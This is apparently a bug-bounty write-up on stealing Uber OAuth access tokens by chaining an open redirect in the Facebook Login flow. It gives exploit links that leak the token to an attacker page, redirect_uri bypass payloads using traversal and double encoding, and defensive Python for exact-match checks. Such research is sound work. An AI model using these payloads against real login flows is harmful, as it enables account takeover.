From Open Redirect to Account Takeover Part II

Part I described how to use an open redirect to obtain an access_token, and all of the basic theory was covered there. This part builds on Part I, adds a few extra tricks, and ends up with a working grab of Uber's access_token.

Uber has integrated FB Login; both auth.uber.com and login.uber.com can initiate it. Clicking the FB button on the page triggers the following link:
https://facebook.com/xxxx?client_id=xxxxxx&redirect_uri=https%3a%2f%2fauth.uber.com%2flogin%3fnext_url=https%3A%2F%2Frush.uber.com%2Flogin%2F&state=m7QWxxPRNII4VGsCSog0xLJ2KF7e8ynpC2c_OAKkQQk%3D

After the login completes, the browser is first redirected to https://auth.uber.com/login?next_url=https://rush.uber.com/login/&state=m7QWxxPRNII4VGsCSog0xLJ2KF7e8ynpC2c_OAKkQQk=#access_token=xxxx

and then from auth.uber.com on to rush.uber.com.

If we can find an open redirect in next_url, then after the hop to next_url we can keep redirecting to a domain of our choosing, and so obtain the access_token.

As it happens, the following link had exactly such an open redirect: the application redirects the user according to the Referer header.

<a href="https://login.uber.com/logout">Click to see</a>

In other words, if we place the link above on www.attacker.com/open-redirect.html, then when a user visits that page and clicks the link, they are redirected back to www.attacker.com.
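The Referer-driven redirect described above is a pattern worth seeing next to its fix. The following is an added example (not Uber's code): a logout handler that decides its post-logout target two ways. The vulnerable version trusts the Referer outright, which is what lets a link hosted on another site pull the user back there; the hardened version honours the Referer only when it is on the application's own origin, and rebuilds the URL from parsed parts so userinfo, ports and fragments cannot ride along. The origin and fallback page are assumed values.

```python
from typing import Optional
from urllib.parse import urlsplit, urlunsplit

# Hypothetical application origin and fallback landing page (assumed values).
APP_SCHEME = "https"
APP_HOST = "login.uber.com"
DEFAULT_AFTER_LOGOUT = "https://login.uber.com/"


def vulnerable_logout_target(referer: Optional[str]) -> str:
    """Vulnerable pattern: whatever page linked to /logout becomes the
    post-logout redirect target, so any site that hosts a link to /logout
    decides where the user (and anything in the URL fragment) ends up."""
    return referer or DEFAULT_AFTER_LOGOUT


def hardened_logout_target(referer: Optional[str]) -> str:
    """Hardened pattern: honour the Referer only when it is on the
    application's own origin, and even then rebuild the URL from the parsed
    pieces so that userinfo, port tricks and fragments cannot survive."""
    if not referer:
        return DEFAULT_AFTER_LOGOUT
    parts = urlsplit(referer)
    # .hostname is lower-cased with userinfo and port stripped, so
    # "https://login.uber.com@www.attacker.com/" compares as www.attacker.com,
    # and "//www.attacker.com/" (no scheme) fails the scheme comparison.
    if parts.scheme.lower() != APP_SCHEME or (parts.hostname or "") != APP_HOST:
        return DEFAULT_AFTER_LOGOUT
    # Keep only path and query; the fragment is dropped so a token carried
    # in "#..." is never re-emitted in the Location header.
    return urlunsplit((APP_SCHEME, APP_HOST, parts.path or "/", parts.query, ""))
```

The safest variant is to ignore the Referer entirely and always send the user to a fixed page; the same-origin version is shown because applications often want to return the user to where they came from, and this is the minimum check that makes that acceptable.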

Exploit 1

<a href="https://facebook.com/xxxx?client_id=xxxxxx&redirect_uri=https%3a%2f%2fauth.uber.com%2flogin%3fnext_url=https%3A%2F%2Flogin.uber.com%2Flogout%2F&state=state">Click to leak</a><script>alert(location.hash)</script>

Exploit 2

Uber later fixed the open redirect in login.uber.com/logout.

Payloads

Below is a series of payloads for checking whether redirect_uri is whitelisted correctly:

  • redirect_uri=https://www.example.com/directory
  • redirect_uri=https://www.example.com/directory?parameter=value
  • redirect_uri=https://www.example.com/directory?parameter=value#
  • redirect_uri=https://www.example.com/directory/../../
  • redirect_uri=https://www.example.com/directory/../../escaped

The result was that the author found https://login.uber.com/login%2F..%2F..%2Flogout, which is in fact the logout page.

So the exploit ends up looking like this:

<a href="https://facebook.com/xxxx?client_id=xxxxxx&redirect_uri=https%3a%2f%2flogin.uber.com%2flogin%252f..%252f..%252flogout&state=state">Click to leak</a><script>alert(location.hash)</script>
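The payload list above is really a test suite for one question: does the redirect_uri check compare the whole value, or only a prefix? The following is an added example (not Uber's or Facebook's code) that runs those payloads, plus the double-encoded traversal shape from the exploit, through a weak prefix check and through the exact string comparison that the OAuth 2.0 Security Best Current Practice requires. A small resolver also shows what each payload actually lands on once the server percent-decodes and collapses ../ segments, which is why "/login%2F..%2F..%2Flogout" serves the logout page. The registered value and the payload targets are constructed from the www.example.com host used in the list.

```python
import posixpath
from typing import Optional, Tuple
from urllib.parse import urlsplit, unquote

# Registered redirect_uri at the identity provider (constructed value, using
# the www.example.com host from the payload list).
REGISTERED = "https://www.example.com/directory"

# The payloads from the list, plus the double-encoded traversal shape from the
# Uber exploit re-targeted at the constructed registration.
PAYLOADS = [
    "https://www.example.com/directory",
    "https://www.example.com/directory?parameter=value",
    "https://www.example.com/directory?parameter=value#",
    "https://www.example.com/directory/../../",
    "https://www.example.com/directory/../../escaped",
    "https://www.example.com/directory%252f..%252f..%252fescaped",
]


def prefix_check(candidate: str, registered: str = REGISTERED) -> bool:
    """Weak whitelist: 'starts with the registered value'. Every payload above
    passes, because the extra query, fragment or ../ sits after a matching
    prefix."""
    return candidate.startswith(registered)


def exact_check(candidate: str, registered: str = REGISTERED) -> bool:
    """Exact string comparison, as the OAuth 2.0 Security BCP requires. No
    decoding or normalisation happens here at all: a value that is not
    byte-for-byte the registered one is rejected."""
    return candidate == registered


def canonical(url: str) -> Optional[Tuple[str, str, str]]:
    """What a server would actually serve for this URL: (scheme, host,
    normalised path), or None if unusable. Percent-decoding is repeated until
    stable so %2F and %252F both become '/', then ./ and ../ segments are
    collapsed the way a router or file system would collapse them."""
    parts = urlsplit(url)
    if parts.scheme.lower() != "https" or not parts.hostname:
        return None
    path = parts.path or "/"
    for _ in range(3):                      # bounded loop: stop once nothing changes
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return (parts.scheme.lower(), parts.hostname, posixpath.normpath(path))


def probe(payloads=PAYLOADS):
    """Run both checks over the payload list.
    Returns {payload: (prefix_check result, exact_check result)}."""
    return {p: (prefix_check(p), exact_check(p)) for p in payloads}
```

The point of canonical() is to explain the bug, not to be the fix: once a whitelist does anything looser than exact comparison, it has to reason about every decoding and path-resolution step the downstream server will perform, and the double-encoded form shows how easy it is to miss one layer. Exact matching sidesteps that entirely, and the same rule should apply to any next_url-style parameter that is consumed after the token has been issued.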

Ref

[Uber] redirect_uri is difficult to do it right – Ron Chan
